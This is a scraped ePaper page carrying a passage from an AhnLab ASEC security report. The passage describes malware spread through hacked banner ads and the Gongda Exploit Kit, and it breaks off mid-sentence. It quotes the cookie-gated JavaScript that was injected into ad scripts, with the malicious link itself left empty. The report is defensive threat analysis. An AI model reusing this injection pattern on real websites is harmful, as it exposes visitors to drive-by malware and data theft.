11.07.2015 Views

ASEC REPORT - AhnLab

ASEC REPORT - AhnLab

ASEC REPORT - AhnLab

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

<strong>ASEC</strong> <strong>REPORT</strong> 41WEB SECURITY TREND2402Web Security TrendWeb Security IssuesThe following is a brief characterization of hacked websites fordistribution of malware in May.Site Banner Ads, Safe?A malware creator usually finds a vulnerable website to hack andupload the malware to distribute it as widely as possible. However,this method is inefficient. Then what may be an efficient methodfor the creator to widely distribute the malware to achieve the goal(of obtaining personal data, Internet banking data, etc)? Hackinga website with banner ads and inserting the malware (a link fordownloading the malware) is one of the most efficient methods.Let's assume the malware creator hacked a banner ad andinserted the code. Other websites, unaware of this can link thebanner ad to themselves and instantly turn into a distribution point.Even if the website is not vulnerable, a banner ad can turn theentire website into a distribution site.Some of the recently found distribution sites show the mentionedbanner ad distribution path, which has been visualized in [Figure 3-6].press website.if(document.cookie.indexOf('ralrlea')==-1){var expires=newDate();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write("");}(2) Web storage site : get_kdisk_bringback.js?_=1369964785811The following code is inserted in the get_kdisk_bringback.js linkedto the web storage site.if(document.cookie.indexOf('ralrlea')==-1){var expires=newDate();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write("");}The banner ad provided to the press and web storage sites camefrom the same banner site, and the inserted malware is identicalexcept the URL(marked in blue).The actual malware score_box.html, personal_if.html was createdwith the Gongda Exploit Kit which can easily be found on malwaredistribution sites.[Figure 3-6] Malware distribution through banner ads(1) Press website: get_bringback.jsThe following code is inserted in the get_bringback.js linked to the[Figure 3-7] score_box.html, personal_if.html created with GongdaExploit KitAs shown in [Figure 3-7], when analyzing these malware, they arecoded to use 6 JAVA vulnerabilities, 1 Flash Player vulnerability,

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!